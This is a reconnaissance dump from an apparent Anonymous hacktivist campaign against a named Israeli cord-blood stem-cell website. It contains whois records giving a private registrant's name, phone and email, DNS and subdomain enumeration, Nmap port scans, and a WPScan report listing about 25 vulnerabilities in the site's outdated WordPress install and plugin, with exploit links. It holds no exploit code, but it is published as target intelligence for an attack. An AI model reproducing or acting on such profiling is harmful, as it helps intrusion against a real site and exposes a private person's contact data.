Anonymous Operation Izsrael USA JTSEC full recon 2018 #7

1. #######################################################################################################################################
2. Hostname www.cord-blood.co.il ISP 012 Smile Communications LTD. (AS9116)
3. Continent Asia Flag
4. IL
5. Country Israel Country Code IL (ISR)
6. Region Unknown Local time 23 Mar 2018 06:21 IDT
7. City Unknown Latitude 31.5
8. IP Address 80.179.142.111 Longitude 34.75
9. #######################################################################################################################################
10.  
11. HostIP:80.179.142.111
12. HostName:cord-blood.co.il
13.  
14. Gathered Inet-whois information for 80.179.142.111
15. ---------------------------------------------------------------------------------------------------------------------------------------
16.  
17.  
18. inetnum: 80.179.141.64 - 80.179.142.255
19. netname: GOLDENLINES-CO-LOCATION
20. descr: Please Send Abuse/SPAM complaints To Abuse@012.net.il
21. country: IL
22. admin-c: DR5299-RIPE
23. tech-c: DR5299-RIPE
24. status: ASSIGNED PA
25. mnt-by: AS9116-MNT
26. mnt-by: AS5486-MNT
27. created: 2017-06-06T09:26:33Z
28. last-modified: 2017-06-06T09:26:33Z
29. source: RIPE # Filtered
30.  
31. role: DNS REG
32. remarks: Hostmaster and LIR
33. remarks: 012 Smile Communications Ltd.
34. address: Hasivim 25 Petach-Tikva,Israel
35. nic-hdl: DR5299-RIPE
36. admin-c: PT5956-RIPE
37. admin-c: AT14340-RIPE
38. admin-c: HAI18-RIPE
39. admin-c: GE1901-RIPE
40. admin-c: ASH73-RIPE
41. admin-c: IK2932-RIPE
42. admin-c: ENT11-RIPE
43. tech-c: PT5956-RIPE
44. tech-c: HAI18-RIPE
45. tech-c: GE1901-RIPE
46. tech-c: IK2932-RIPE
47. tech-c: ENT11-RIPE
48. mnt-by: AS9116-MNT
49. mnt-by: PARTNERCOM-MNT
50. created: 2002-09-19T08:35:05Z
51. last-modified: 2017-10-18T10:49:53Z
52. source: RIPE # Filtered
53. abuse-mailbox: abuse@012.net.il
54.  
55. % Information related to '80.179.142.0/24AS9116'
56.  
57. route: 80.179.142.0/24
58. descr: Golden Lines
59. origin: AS9116
60. mnt-by: AS9116-MNT
61. created: 2005-06-07T17:23:50Z
62. last-modified: 2005-06-07T17:23:50Z
63. source: RIPE
64.  
65. % This query was served by the RIPE Database Query Service version 1.91.1 (WAGYU)
66.  
67.  
68.  
69. Gathered Inic-whois information for cord-blood.co.il
70. ---------------------------------------------------------------------------------------------------------------------------------------
71. domain: cord-blood.co.il
72.  
73. descr: shiran levin
74. descr: P.o Box 22836
75. descr: Tel Aviv
76. descr: 61227
77. descr: Israel
78. phone: +972 3 5446364
79. fax-no: +972 3 5446366
80. e-mail: shiran AT matan-arts.org.il
81. admin-c: IS-SL6462-IL
82. tech-c: IS-ID1078-IL
83. zone-c: IS-ID1078-IL
84. nserver: ns1.shivyon.co.il
85. nserver: ns2.shivyon.co.il
86. validity: 06-07-2019
87. DNSSEC: unsigned
88. status: Transfer Locked
89. changed: domain-registrar AT isoc.org.il 20090706 (Assigned)
90.  
91. person: shiran Levin
92. address: shiran levin
93. address: P.o Box 22836
94. address: Tel Aviv
95. address: 61227
96. address: Israel
97. phone: +972 3 5446364
98. fax-no: +972 3 5446366
99. e-mail: shiran AT matan-arts.org.il
100. nic-hdl: IS-SL6462-IL
101. changed: domain-registrar AT isoc.org.il 20090706
102.  
103. person: Interspace Domreg
104. address: Interspace Ltd.
105. address: P.O.Box 8723
106. address: Netanya
107. address: 42505
108. address: Israel
109. phone: +972 73 2224444
110. fax-no: +972 73 2224440
111. e-mail: domreg AT interspace.net
112. nic-hdl: IS-ID1078-IL
113. changed: Managing Registrar 20070110
114. changed: Managing Registrar 20070319
115. changed: Managing Registrar 20070909
116. changed: Managing Registrar 20090514
117. changed: Managing Registrar 20110720
118. changed: Managing Registrar 20110720
119. changed: Managing Registrar 20110721
120. changed: Managing Registrar 20111128
121. changed: Managing Registrar 20111128
122. changed: Managing Registrar 20130924
123. changed: Managing Registrar 20130924
124. changed: Managing Registrar 20130924
125. changed: Managing Registrar 20130924
126. changed: Managing Registrar 20130924
127. changed: Managing Registrar 20170518
128. changed: Managing Registrar 20170716
129.  
130. registrar name: InterSpace Ltd
131. registrar info: http://www.internic.co.il
132.  
133. % Rights to the data above are restricted by copyright.
134.  
135. Gathered Netcraft information for cord-blood.co.il
136. ---------------------------------------------------------------------------------------------------------------------------------------
137.  
138. Retrieving Netcraft.com information for cord-blood.co.il
139. Netcraft.com Information gathered
140.  
141. Gathered Subdomain information for cord-blood.co.il
142. ---------------------------------------------------------------------------------------------------------------------------------------
143. Searching Google.com:80...
144. Searching Altavista.com:80...
145. Found 0 possible subdomain(s) for host cord-blood.co.il, Searched 0 pages containing 0 results
146.  
147. Gathered E-Mail information for cord-blood.co.il
148. ---------------------------------------------------------------------------------------------------------------------------------------
149. Searching Google.com:80...
150. Searching Altavista.com:80...
151. Found 0 E-Mail(s) for host cord-blood.co.il, Searched 0 pages containing 0 results
152.  
153. Gathered TCP Port information for 80.179.142.111
154. ---------------------------------------------------------------------------------------------------------------------------------------
155.  
156. Port State
157.  
158. 21/tcp open
159. 53/tcp open
160. 80/tcp open
161. 110/tcp open
162. 143/tcp open
163. #######################################################################################################################################
164. [i] Scanning Site: http://cord-blood.co.il
165.  
166.  
167.  
168. B A S I C I N F O
169. =======================================================================================================================================
170.  
171.  
172. [+] Site Title: דם טבורי - תאי גזע להצלת חיים
173. [+] IP address: 80.179.142.111
174. [+] Web Server: nginx
175. [+] CMS: WordPress
176. [+] Cloudflare: Not Detected
177. [+] Robots File: Could NOT Find robots.txt!
178.  
179.  
180.  
181.  
182. W H O I S L O O K U P
183. =======================================================================================================================================
184.  
185.  
186. % The data in the WHOIS database of the .il registry is provided
187. % by ISOC-IL for information purposes, and to assist persons in
188. % obtaining information about or related to a domain name
189. % registration record. ISOC-IL does not guarantee its accuracy.
190. % By submitting a WHOIS query, you agree that you will use this
191. % Data only for lawful purposes and that, under no circumstances
192. % will you use this Data to: (1) allow, enable, or otherwise
193. % support the transmission of mass unsolicited, commercial
194. % advertising or solicitations via e-mail (spam);
195. % or (2) enable high volume, automated, electronic processes that
196. % apply to ISOC-IL (or its systems).
197. % ISOC-IL reserves the right to modify these terms at any time.
198. % By submitting this query, you agree to abide by this policy.
199.  
200. query: cord-blood.co.il
201.  
202. reg-name: cord-blood
203. domain: cord-blood.co.il
204.  
205. descr: shiran levin
206. descr: P.o Box 22836
207. descr: Tel Aviv
208. descr: 61227
209. descr: Israel
210. phone: +972 3 5446364
211. fax-no: +972 3 5446366
212. e-mail: shiran AT matan-arts.org.il
213. admin-c: IS-SL6462-IL
214. tech-c: IS-ID1078-IL
215. zone-c: IS-ID1078-IL
216. nserver: ns1.shivyon.co.il
217. nserver: ns2.shivyon.co.il
218. validity: 06-07-2019
219. DNSSEC: unsigned
220. status: Transfer Locked
221. changed: domain-registrar AT isoc.org.il 20090706 (Assigned)
222.  
223. person: shiran Levin
224. address: shiran levin
225. address: P.o Box 22836
226. address: Tel Aviv
227. address: 61227
228. address: Israel
229. phone: +972 3 5446364
230. fax-no: +972 3 5446366
231. e-mail: shiran AT matan-arts.org.il
232. nic-hdl: IS-SL6462-IL
233. changed: domain-registrar AT isoc.org.il 20090706
234.  
235. person: Interspace Domreg
236. address: Interspace Ltd.
237. address: P.O.Box 8723
238. address: Netanya
239. address: 42505
240. address: Israel
241. phone: +972 73 2224444
242. fax-no: +972 73 2224440
243. e-mail: domreg AT interspace.net
244. nic-hdl: IS-ID1078-IL
245. changed: Managing Registrar 20070110
246. changed: Managing Registrar 20070319
247. changed: Managing Registrar 20070909
248. changed: Managing Registrar 20090514
249. changed: Managing Registrar 20110720
250. changed: Managing Registrar 20110720
251. changed: Managing Registrar 20110721
252. changed: Managing Registrar 20111128
253. changed: Managing Registrar 20111128
254. changed: Managing Registrar 20130924
255. changed: Managing Registrar 20130924
256. changed: Managing Registrar 20130924
257. changed: Managing Registrar 20130924
258. changed: Managing Registrar 20130924
259. changed: Managing Registrar 20170518
260. changed: Managing Registrar 20170716
261.  
262. registrar name: InterSpace Ltd
263. registrar info: http://www.internic.co.il
264.  
265. % Rights to the data above are restricted by copyright.
266.  
267.  
268.  
269.  
270. G E O I P L O O K U P
271. =======================================================================================================================================
272.  
273. [i] IP Address: 80.179.142.111
274. [i] Country: IL
275. [i] State: N/A
276. [i] City: N/A
277. [i] Latitude: 31.500000
278. [i] Longitude: 34.750000
279.  
280.  
281.  
282.  
283. H T T P H E A D E R S
284. ======================================================================================================================================
285.  
286.  
287. [i] HTTP/1.1 301 Moved Permanently
288. [i] Server: nginx
289. [i] Date: Fri, 23 Mar 2018 03:24:09 GMT
290. [i] Content-Type: text/html; charset=UTF-8
291. [i] Content-Length: 0
292. [i] Connection: close
293. [i] X-Powered-By: PHP/5.2.17
294. [i] X-Pingback: http://www.cord-blood.co.il/xmlrpc.php
295. [i] Location: http://www.cord-blood.co.il/
296. [i] Vary: User-Agent
297. [i] X-Rocket-Nginx-Bypass: No
298. [i] HTTP/1.1 200 OK
299. [i] Server: nginx
300. [i] Date: Fri, 23 Mar 2018 03:24:19 GMT
301. [i] Content-Type: text/html; charset=UTF-8
302. [i] Connection: close
303. [i] Vary: Accept-Encoding
304. [i] X-Powered-By: PHP/5.2.17
305. [i] X-Pingback: http://www.cord-blood.co.il/xmlrpc.php
306. [i] Vary: Accept-Encoding,User-Agent
307. [i] X-Rocket-Nginx-Bypass: No
308.  
309.  
310.  
311.  
312. D N S L O O K U P
313. ======================================================================================================================================
314.  
315. ;; Truncated, retrying in TCP mode.
316. cord-blood.co.il. 14400 IN SOA ns1.spd.co.il. hostmaster.cord-blood.co.il. 2016061501 14400 3600 1209600 86400
317. cord-blood.co.il. 14400 IN NS ns1.spd.co.il.
318. cord-blood.co.il. 14400 IN NS ns2.spd.co.il.
319. cord-blood.co.il. 14400 IN A 80.179.142.111
320. cord-blood.co.il. 14400 IN MX 10 mailgw2.spd.co.il.
321. cord-blood.co.il. 14400 IN TXT "v=spf1 a mx ip4:80.179.142.111 ~all"
322.  
323.  
324.  
325.  
326. S U B N E T C A L C U L A T I O N
327. =====================================================================================================================================
328.  
329. Address = 80.179.142.111
330. Network = 80.179.142.111 / 32
331. Netmask = 255.255.255.255
332. Broadcast = not needed on Point-to-Point links
333. Wildcard Mask = 0.0.0.0
334. Hosts Bits = 0
335. Max. Hosts = 1 (2^0 - 0)
336. Host Range = { 80.179.142.111 - 80.179.142.111 }
337.  
338.  
339.  
340. N M A P P O R T S C A N
341. =======================================================================================================================================
342.  
343.  
344. Starting Nmap 7.01 ( https://nmap.org ) at 2018-03-23 03:24 UTC
345. Nmap scan report for cord-blood.co.il (80.179.142.111)
346. Host is up (0.14s latency).
347. rDNS record for 80.179.142.111: yanir.spd.co.il
348. PORT STATE SERVICE VERSION
349. 21/tcp open ftp ProFTPD
350. 22/tcp filtered ssh
351. 23/tcp closed telnet
352. 25/tcp open smtp Exim smtpd
353. 80/tcp open http nginx
354. 110/tcp open pop3 Dovecot DirectAdmin pop3d
355. 143/tcp open imap Dovecot imapd
356. 443/tcp open ssl/http nginx
357. 445/tcp closed microsoft-ds
358. 3389/tcp closed ms-wbt-server
359.  
360. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
361. Nmap done: 1 IP address (1 host up) scanned in 17.18 seconds
362. #####################################################################################################################################
363. [!] IP Address : 80.179.142.111
364. [+] Operating System : Windows
365. [!] www.cord-blood.co.il doesn't seem to use a CMS
366. [+] Honeypot Probabilty: 30%
367. --------------------------------------------------------------------------------------------------------------------------------------
368. [~] Trying to gather whois information for www.cord-blood.co.il
369. [+] Whois information found
370. Registrant Name : shiran Levin, Interspace Domreg
371. Status : Transfer Locked
372. Dnssec : unsigned
373. Expiration Date : 2019-07-06 00:00:00
374. Domain Name : cord-blood.co.il
375. Phone : +972 3 5446364, +972 73 2224444
376. Registrar : InterSpace Ltd
377. Referral Url : http://www.internic.co.il
378. Name Servers : ns1.shivyon.co.il, ns2.shivyon.co.il
379. Emails : shiran@matan-arts.org.il, domreg@interspace.net
380. --------------------------------------------------------------------------------------------------------------------------------------
381. PORT STATE SERVICE VERSION
382. 21/tcp open ftp ProFTPD
383. 22/tcp filtered ssh
384. 23/tcp closed telnet
385. 25/tcp open smtp Exim smtpd
386. 80/tcp open http nginx
387. 110/tcp open pop3 Dovecot DirectAdmin pop3d
388. 143/tcp open imap Dovecot imapd
389. 443/tcp open ssl/http nginx
390. 445/tcp closed microsoft-ds
391. 3389/tcp closed ms-wbt-server
392. ---------------------------------------------------------------------------------------------------------------------------------------
393.  
394. [+] DNS Records
395.  
396. [+] Host Records (A)
397. www.cord-blood.co.ilHTTP: (80.179.142.111) AS9116 012 Smile Communications LTD. Israel
398.  
399. [+] TXT Records
400.  
401. [+] DNS Map: https://dnsdumpster.com/static/map/cord-blood.co.il.png
402.  
403. [>] Initiating 3 intel modules
404. [>] Loading Alpha module (1/3)
405. [>] Beta module deployed (2/3)
406. [>] Gamma module initiated (3/3)
407. No emails found
408. No hosts found
409. [+] Virtual hosts:
410. ---------------------------------------------------------------------------------------------------------------------------------------
411. [~] Crawling the target for fuzzable URLs
412. #######################################################################################################################################
413. [+] Getting nameservers
414. 80.179.148.8 - ns2.spd.co.il
415. 212.199.164.175 - ns1.spd.co.il
416. [-] Zone transfer failed
417.  
418. [+] TXT records found
419. "v=spf1 a mx ip4:80.179.142.111 ~all"
420.  
421. [+] MX records found, added to target list
422. 10 mailgw2.spd.co.il.
423.  
424. [*] Scanning cord-blood.co.il for A records
425. 80.179.142.111 - cord-blood.co.il
426. 80.179.142.111 - ftp.cord-blood.co.il
427. 127.0.0.1 - localhost.cord-blood.co.il
428. 80.179.142.111 - mail.cord-blood.co.il
429. 80.179.142.111 - pop.cord-blood.co.il
430. 80.179.142.111 - smtp.cord-blood.co.il
431. 80.179.142.111 - www.cord-blood.co.il
432. #######################################################################################################################################
433. Ip Address Status Type Domain Name Server
434. ---------- ------ ---- ----------- ------
435. 80.179.142.111 200 host ftp.cord-blood.co.il nginx
436. 127.0.0.1 host localhost.cord-blood.co.il
437. 80.179.142.111 200 host mail.cord-blood.co.il nginx
438. 80.179.142.111 200 host pop.cord-blood.co.il nginx
439. 80.179.142.111 200 host smtp.cord-blood.co.il nginx
440. 80.179.142.111 200 host www.cord-blood.co.il nginx
441. ######################################################################################################################################
442. Original* cord-blood.co.il 80.179.142.111 NS:ns1.spd.co.il MX:mailgw2.spd.co.il
443.  
444. Omission cordblood.co.il 212.150.158.108 NS:ns1.hostech.co.il MX:mail.cordblood.co.il
445.  
446. Subdomain cord-bloo.d.co.il 37.19.112.17
447.  
448. Various cord-blood.co-il.com NS:ns1.dnslink.com
449. #######################################################################################################################################
450. [+] URL: http://www.cord-blood.co.il/
451. [+] Started: Fri Mar 23 00:17:00 2018
452.  
453. [!] The WordPress 'http://www.cord-blood.co.il/readme.html' file exists exposing a version number
454. [+] Interesting header: SERVER: nginx
455. [+] Interesting header: X-POWERED-BY: PHP/5.2.17
456. [+] Interesting header: X-ROCKET-NGINX-BYPASS: No
457.  
458. [+] WordPress version 2.7.1 (Released on 2009-02-10) identified from stylesheets numbers, advanced fingerprinting, meta generator, sitemap generator, links opml
459. [!] 25 vulnerabilities identified from the version number
460.  
461. [!] Title: WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass
462. Reference: https://wpvulndb.com/vulnerabilities/6019
463. Reference: http://www.securityfocus.com/bid/35584/
464.  
465. [!] Title: WordPress 2.5 - 3.3.1 XSS in swfupload
466. Reference: https://wpvulndb.com/vulnerabilities/5999
467. Reference: http://seclists.org/fulldisclosure/2012/Nov/51
468. [i] Fixed in: 3.3.2
469.  
470. [!] Title: WordPress 1.5.1 - 3.5 XMLRPC Pingback API Internal/External Port Scanning
471. Reference: https://wpvulndb.com/vulnerabilities/5988
472. Reference: https://github.com/FireFart/WordpressPingbackPortScanner
473. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0235
474. [i] Fixed in: 3.5.1
475.  
476. [!] Title: WordPress 1.5.1 - 3.5 XMLRPC pingback additional issues
477. Reference: https://wpvulndb.com/vulnerabilities/5989
478. Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html
479.  
480. [!] Title: WordPress 2.0 - 3.0.1 wp-includes/comment.php Bypass Spam Restrictions
481. Reference: https://wpvulndb.com/vulnerabilities/6009
482. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5293
483. [i] Fixed in: 3.0.2
484.  
485. [!] Title: WordPress 2.0 - 3.0.1 Multiple Cross-Site Scripting (XSS) in request_filesystem_credentials()
486. Reference: https://wpvulndb.com/vulnerabilities/6010
487. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5294
488. [i] Fixed in: 3.0.2
489.  
490. [!] Title: WordPress 2.0 - 3.0.1 Cross-Site Scripting (XSS) in wp-admin/plugins.php
491. Reference: https://wpvulndb.com/vulnerabilities/6011
492. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5295
493. [i] Fixed in: 3.0.2
494.  
495. [!] Title: WordPress 2.0 - 3.0.1 wp-includes/capabilities.php Remote Authenticated Administrator Delete Action Bypass
496. Reference: https://wpvulndb.com/vulnerabilities/6012
497. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5296
498. [i] Fixed in: 3.0.2
499.  
500. [!] Title: WordPress 2.0 - 3.0 Remote Authenticated Administrator Add Action Bypass
501. Reference: https://wpvulndb.com/vulnerabilities/6013
502. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5297
503. [i] Fixed in: 3.0
504.  
505. [!] Title: WordPress 2.0.3 - 3.9.1 (except 3.7.4 / 3.8.4) CSRF Token Brute Forcing
506. Reference: https://wpvulndb.com/vulnerabilities/7528
507. Reference: https://core.trac.wordpress.org/changeset/29384
508. Reference: https://core.trac.wordpress.org/changeset/29408
509. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5204
510. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5205
511. [i] Fixed in: 3.9.2
512.  
513. [!] Title: WordPress <= 4.0 - Long Password Denial of Service (DoS)
514. Reference: https://wpvulndb.com/vulnerabilities/7681
515. Reference: http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
516. Reference: https://wordpress.org/news/2014/11/wordpress-4-0-1/
517. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9034
518. Reference: https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_long_password_dos
519. Reference: https://www.exploit-db.com/exploits/35413/
520. Reference: https://www.exploit-db.com/exploits/35414/
521. [i] Fixed in: 4.0.1
522.  
523. [!] Title: WordPress <= 4.0 - Server Side Request Forgery (SSRF)
524. Reference: https://wpvulndb.com/vulnerabilities/7696
525. Reference: http://www.securityfocus.com/bid/71234/
526. Reference: https://core.trac.wordpress.org/changeset/30444
527. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9038
528. [i] Fixed in: 4.0.1
529.  
530. [!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
531. Reference: https://wpvulndb.com/vulnerabilities/8473
532. Reference: https://codex.wordpress.org/Version_4.5
533. Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
534. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
535. [i] Fixed in: 4.5
536.  
537. [!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
538. Reference: https://wpvulndb.com/vulnerabilities/8520
539. Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
540. Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
541. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
542. [i] Fixed in: 4.5.3
543.  
544. [!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
545. Reference: https://wpvulndb.com/vulnerabilities/8615
546. Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
547. Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
548. Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
549. Reference: http://seclists.org/fulldisclosure/2016/Sep/6
550. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
551. [i] Fixed in: 4.6.1
552.  
553. [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
554. Reference: https://wpvulndb.com/vulnerabilities/8719
555. Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
556. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
557. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
558. [i] Fixed in: 4.7.1
559.  
560. [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
561. Reference: https://wpvulndb.com/vulnerabilities/8807
562. Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
563. Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
564. Reference: https://core.trac.wordpress.org/ticket/25239
565. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
566.  
567. [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
568. Reference: https://wpvulndb.com/vulnerabilities/8815
569. Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
570. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
571. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
572. [i] Fixed in: 4.7.5
573.  
574. [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
575. Reference: https://wpvulndb.com/vulnerabilities/8816
576. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
577. Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
578. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
579. [i] Fixed in: 4.7.5
580.  
581. [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
582. Reference: https://wpvulndb.com/vulnerabilities/8818
583. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
584. Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
585. Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
586. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
587. [i] Fixed in: 4.7.5
588.  
589. [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
590. Reference: https://wpvulndb.com/vulnerabilities/8905
591. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
592. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
593. Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
594. [i] Fixed in: 4.8.2
595.  
596. [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
597. Reference: https://wpvulndb.com/vulnerabilities/8906
598. Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
599. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
600. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
601. Reference: https://wpvulndb.com/vulnerabilities/8905
602. [i] Fixed in: 4.7.5
603.  
604. [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
605. Reference: https://wpvulndb.com/vulnerabilities/8941
606. Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
607. Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
608. Reference: https://twitter.com/ircmaxell/status/923662170092638208
609. Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
610. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
611. [i] Fixed in: 4.8.3
612.  
613. [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
614. Reference: https://wpvulndb.com/vulnerabilities/8967
615. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
616. Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
617. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
618. [i] Fixed in: 4.9.1
619.  
620. [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
621. Reference: https://wpvulndb.com/vulnerabilities/9021
622. Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
623. Reference: https://github.com/quitten/doser.py
624. Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
625. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
626.  
627. [+] WordPress theme in use: painter - v1.1
628.  
629. [+] Name: painter - v1.1
630. | Last updated: 2013-10-31T00:00:00.000Z
631. | Location: http://www.cord-blood.co.il/wp-content/themes/painter/
632. | Readme: http://www.cord-blood.co.il/wp-content/themes/painter/readme.txt
633. [!] The version is out of date, the latest version is 2.5
634. | Style URL: http://www.cord-blood.co.il/wp-content/themes/painter/style.css
635. | Referenced style.css: http://www.cord-blood.co.il/wp-content/themes/painter/css/style.css
636. | Theme Name: Painter
637. | Theme URI: http://www.marcelomesquita.com/tema-painter/
638. | Description: A simple theme, with solid colors and a few pictures... but highly customizable. The highlight of...
639. | Author: Marcelo Mesquita
640. | Author URI: http://www.marcelomesquita.com/
641.  
642. [+] Enumerating plugins from passive detection ...
643. | 1 plugin found:
644.  
645. [+] Name: all-in-one-seo-pack - v1.4.6.15
646. | Last updated: 2018-03-16T01:10:00.000Z
647. | Location: http://www.cord-blood.co.il/wp-content/plugins/all-in-one-seo-pack/
648. | Readme: http://www.cord-blood.co.il/wp-content/plugins/all-in-one-seo-pack/readme.txt
649. [!] The version is out of date, the latest version is 2.4.6.1
650.  
651. [!] Title: All in One SEO Pack <= 2.1.5 - aioseop_functions.php new_meta Parameter XSS
652. Reference: https://wpvulndb.com/vulnerabilities/6888
653. Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
654. [i] Fixed in: 2.1.6
655.  
656. [!] Title: All in One SEO Pack <= 2.1.5 - Unspecified Privilege Escalation
657. Reference: https://wpvulndb.com/vulnerabilities/6889
658. Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
659. [i] Fixed in: 2.1.6
660.  
661. [!] Title: All in One SEO Pack <= 2.0.3 - XSS
662. Reference: https://wpvulndb.com/vulnerabilities/6890
663. Reference: http://packetstormsecurity.com/files/123490/
664. Reference: http://www.securityfocus.com/bid/62784/
665. Reference: http://seclists.org/bugtraq/2013/Oct/8
666. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5988
667. Reference: https://secunia.com/advisories/55133/
668. [i] Fixed in: 2.0.3.1
669.  
670. [!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure
671. Reference: https://wpvulndb.com/vulnerabilities/7881
672. Reference: http://jvn.jp/en/jp/JVN75615300/index.html
673. Reference: http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
674. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
675. [i] Fixed in: 2.2.6
676.  
677. [!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
678. Reference: https://wpvulndb.com/vulnerabilities/7916
679. Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
680. [i] Fixed in: 2.2.6.2
681.  
682. [!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
683. Reference: https://wpvulndb.com/vulnerabilities/8538
684. Reference: http://seclists.org/fulldisclosure/2016/Jul/23
685. Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
686. Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
687. Reference: https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability
688. Reference: https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/
689. [i] Fixed in: 2.3.7
690.  
691. [!] Title: All in One SEO Pack <= 2.3.7 - Unauthenticated Stored Cross-Site Scripting (XSS)
692. Reference: https://wpvulndb.com/vulnerabilities/8558
693. Reference: https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/
694. Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
695. [i] Fixed in: 2.3.8
696. #####################################################################################################################################
697. Server: 10.211.254.254
698. Address: 10.211.254.254#53
699.  
700. Non-authoritative answer:
701. Name: cord-blood.co.il
702. Address: 80.179.142.111
703.  
704. cord-blood.co.il has address 80.179.142.111
